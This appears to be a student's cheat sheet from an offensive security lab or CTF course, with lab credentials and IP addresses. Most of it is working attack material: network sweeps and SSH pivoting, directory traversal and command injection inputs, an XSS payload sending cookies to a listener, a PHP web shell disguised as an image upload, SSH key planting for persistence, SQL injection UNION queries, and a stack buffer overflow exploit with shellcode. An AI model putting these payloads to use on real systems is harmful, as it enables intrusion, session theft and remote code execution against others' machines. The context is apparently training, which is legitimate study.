------------------------------------------------SECURITY---------------------------------------------------------
Research
https://www.exploit-db.com/exploits/49637 ----------> HIGHLY RECOMMENED
https://nvd.nist.gov/vuln/detail/cve-2021-26855
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-26855
https://www.w3schools.com/SQL/sql_syntax.asp
https://github.com/halfopenhearts/knowledge/blob/main/exploit%20dev.md
-----------------------------------------------------------------------------------------
http://127.0.0.1:1111/classinfo.html --------> CTFd

Stack Number	Username	Password	    jump
5 	         GIEC-M-503 A0C9TRXBAzzk 	10.50.15.242      creds: agent :: stealth_mode_on

http://10.50.143.84:8000 ----------> CTF Challenges

  ---RAPIDLY SCAN HOSTS IN A NETWORK---
for i in {1..255}; do (ping -c 1 10.50.12.$i | grep "bytes from" &); done

-----------------------------------------PORT DISCOVERY---------------------------------------------
 nmap -p 53 --script dns* 10.50.12.22-24

nmap -p 80 --script http-enum 10.50.12.22-24

for i in {96..128}; do proxychains nc -nvzw1 129.168.NetID.$i 22 53 80 135 137 139 445 2>&1 | grep OK | grep -Eo "192.168.NetID.:[0-9]" ;done

----ESTABLISH MULTIPLE SSH TUNNELS----
ssh -S /tmp/jump jump -O forward -L1111:10.50.12.21:22 -L112:10.50.12.21:80 

----SHUTDOWN MULTIPLE SSH TUNNELS----
ssh -S /tmp/jump jump -O exit -L1111:10.50.12.21:22 -L112:10.50.12.21:80 

----PROXYCHAINS TUNNEL FOR TOOLS----
ssh -S /tmp/jump jump -O forward -D 9050

------ESTABLIHS MASTER SOCKET------
ssh -MS /tmp/jump agent@10.50.15.242        ssh -S /tmp/jump jump

-----------------------------------------------------------------------------------------------------------------
                    # Create Master Socket
                    ssh -MS /tmp/demo demo1@10.50.12.21 -nF 2>/dev/null
                    ssh -S /tmp/demo demo1@10.50.12.21 
                    
                    # Host Enum, Ping Sweep (from remote box)
                    for i in {1..255}; do (ping -c 1 10.208.50.$i | gep "bytes from" &); done
                    
                    10.208.50.42
                    ---------------------------------------
                    for i in {1..255}; do echo $i; done
------------------------------------------------------------------------------------------------------------

# Port Enum with dynamic and proxychains 
ssh -S /tmp/demo demo -O forward -D 9050
    ss -ntpl | grep 9050  #Sanity check, verify port opened
proxychains nmap 10.208.50.42

# Tunnel to...
10.208.50.42

22/tcp open  ssh
ssh -S /tmp/demo demo -O forward -L42071:10.208.50.42:22
ssh -MS /tmp/t1 -i $HOME/.ssh/id_rsa www-data@127.0.0.1 -p 42071 -fN 2>/dev/null

80/tcp open  http
ssh -S /tmp/demo demo -O forward -L42070:10.208.50.42:80  #Executed from lin-ops

# HTTP Enum, We would add notes to pages we find 
# Check /robots.txt
proxychains nmap --script=http-enum 10.208.50.42 80
|    /robots.txt
|    /java/
|    /path/
|    /uploads/
|    /webexample/
|    /cross/
|    /cmdinjection/
|    /texts/

# Directory Traversal takes advantage of READING files and using absolute path 
../../../../../../etc/passwd
../../../../../../etc/hosts    #Goes into URL

# CMD Injection uses semi-colon to run commands (not an active shell, can cd) 
; whoami

# Javascript
Open Inspector
Find JS by looking for functions (
Open console in Inspector and run js manually, e.g. changetext()

# Steal cookies
Setup nc listener
nc -lk 10.50.187.52 42071  # Where you want to intercept cookie
nc -Cv 192.168.28.111 8080
GET / HTTP/1.0
Post to chat...
<script>document.location="http://10.50.187.52:42070/?username=" + document.cookie;</script>

# Malicious upload requires 1. Upload, 2. Find uploads, 3. Call uploads

touch 503.png.php
<HTML><BODY>
  <FORM METHOD="GET" NAME="myform" ACTION="">
  <INPUT TYPE="text" NAME="cmd">
  <INPUT TYPE="submit" VALUE="Send">
  </FORM>
  <pre>
  <?php
  if($_GET['cmd']) {
    system($_GET['cmd']);
    }
  ?>
  </pre>
  </BODY></HTML>
#Travel to /uploads URL

### SSH KEYGEN ###
Identify user and home directory using whoami and cat /etc/passwd

# Generate our key
### From lin-ops
ssh-keygen -t rsa -b 4096 # Enter for default option
No Passphrase
cat /home/student/.ssh/id_rsa.pub

## On Target, make directory and verify
; mkdir /var/www/.ssh
; ls -la /var/www

## One Target, upload key and verify
; echo "" > /var/www/.ssh/authorized_keys # Paste whole key into echo
; cat /var/www/.ssh/authorized_keys
----------------------------------------------------------------------------------------------------------------------
### SQL INJECTION ###
User enters tom' OR 1='1 in the name and pass fields.
Truth Statement: tom ' OR 1='1
Server-Side query executed would appear like this:
SELECT id FROM users WHERE name=‘tom' OR 1='1’ AND pass=‘tom' OR 1='1’
    ### POST METHOD ###
## STEP 1
# Use to check if field is vulnerable / no sanitization   
| <value> 'OR 1=1' | 

## STEP 2
# Number of columns with numbers
| <value>' UNION SELECT 1,2,3,4,5 FROM information_schema.tables # |

## STEP 3
# Golden statement
| <value>' UNION SELECT 1,2,table_schema,table_name,column_name FROM information_schema.columns; # |

## STEP 4
#
| <value>' UNION SELECT tireid,2,size,cost,5 FROM session.Tires # | 

    ### GET METHOD ###
## STEP 1
| Selection=1 or 1=1 |

## STEP 2
| Selection=2 UNION SELECT 1,2,3 # | 

## STEP 3
| Selection=2 UNION SELECT 1,table_schema,table_name FROM information_schema.tables
----------------------------------------------------------------------------------------------
### GDB COMMON COMMANDS ###
disass <FUNCTION>   #   Disassemble portion of the program
info <...>  #   Supply info for specific stack areas
x/256c $<REGISTER>  #   Read characters from specific register
break <address>  #   Establish a break point

-------------------------------------------------------------------------------------------
 1 ## Download func
 2
 3 ## Static Analysis ##
 4 ## strings func
 5 ## file func
 6     ## Wants a String, is an ELF (executable)
 7
 8 ## Behavioral Analysis ##
 9 ## chmod u+x func
10 ## run it 
11 # Command Substitution (parameter):            TEST EVERY SINGLE TIME!!! (parameter) or (UI)
12     # ./func $(echo "12345") 
13 # User Input:
14     # ./func <<<$(echo "12345")
15
16 ## Dynamic Analysis ##
17 # Fuzzing
18    # ./func <<<$(echo "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")      BREAKING FUNCTION
19    # ./func <<<$(echo "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")  ENOUGH TO BREAK
20
21 # gdb ./func
22      # shell (gives shell)
23      # exit (gets us back to gdb)
24      # info functions
25      # run (Ctrl + c to exit)
26      # info functions again (more output)
27 # Dissassembly
28     # pdisass main  
29     # pdisass <new function call>
30
-----------------------------------------------------------------------------------------------------------
#!/usr/bin/env python

offset = "A" * 100
# offset = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A"   THIS COMES 2ND (use wiremask buffer generator)

print(offset)

# Back in GDB, run <<<$(python ./lin.py)
# Put register value in Wiremask to find Offset.
# Use Wiremask to find EIP
# Verify EIP by putting 4*"B"s
# Find the JMP ESP location
    #shell
    #env - gdb ./func
    #unset env LINES
    #unset env COLUMNS
    #show env (verify nothing is in there)
    ## run OR start (run just runs it, start allows for breakpoint)
    #info proc map
        #(may need to run "step" and "info proc map" again to see heap and stac
    #memory address after heap:0xf7de10001
    #memory address before stack:0xffffe000
    #find /b 0xf7de1000, 0xffffe000, 0xff, 0xe4
    ## JMP EST locations:    FIRST 5
    0xf7de9d29
    0xf7deb439
0xf7debd49
0xf7e2eb2c
0xf7ec60b7 <lchmod+7>
0xf7edd10d <fgetspent+205>
0xf7f24223
0xf7f2d7a2
0xf7f2eb78
0xf7f305f8
0xf7f32b22
0xf7f58b93
0xf7f647ef
#Little Endian 
    #f7 de 3b 59 > \x59\x3b\xde\xf7

nop = "\x90" * 15 
print(offset + eip + nop)
#msfvenom payload:
    #msfvenom -p linux/x86/exec CMD=whoami -b "\x00\xfe\x20\x0a\xff" -f python

buf =  b""
buf += b"\xba\xef\x1e\xda\x84\xda\xc4\xd9\x74\x24\xf4\x5f"
buf += b"\x29\xc9\xb1\x0b\x83\xef\xfc\x31\x57\x10\x03\x57"
buf += b"\x10\x0d\xeb\xb0\x8f\x89\x8d\x17\xf6\x41\x83\xf4"
buf += b"\x7f\x76\xb3\xd5\x0c\x10\x44\x42\xdc\x82\x2d\xfc"
buf += b"\xab\xa1\xfc\xe8\xab\x25\x01\xe9\xc4\x4d\x6e\x88"
buf += b"\x47\xe4\x70\x1d\xcb\x7f\x91\x6c\x6b"

-------------------------UPDATED EXAMPLE WITH OFFSET VALUE AND EIP--------------------------
#!/usr/bin/env python
offset = "A" * 62
eip = "\x59\x3b\xde\xf7"
nop = "\x90" * 15 
buf =  b""
buf += b"\xba\xef\x1e\xda\x84\xda\xc4\xd9\x74\x24\xf4\x5f"
buf += b"\x29\xc9\xb1\x0b\x83\xef\xfc\x31\x57\x10\x03\x57"
buf += b"\x10\x0d\xeb\xb0\x8f\x89\x8d\x17\xf6\x41\x83\xf4"
buf += b"\x7f\x76\xb3\xd5\x0c\x10\x44\x42\xdc\x82\x2d\xfc"
buf += b"\xab\xa1\xfc\xe8\xab\x25\x01\xe9\xc4\x4d\x6e\x88"
buf += b"\x47\xe4\x70\x1d\xcb\x7f\x91\x6c\x6b"
print(offset + eip + nop + buf)
#msfvenom payload:
    #msfvenom -p linux/x86/exec CMD=whoami -b "\x00\xfe\x20\x0a\xff" -f python

ADD ALL RESULTS TO SCIRPT AND PRINT STATEMENT























































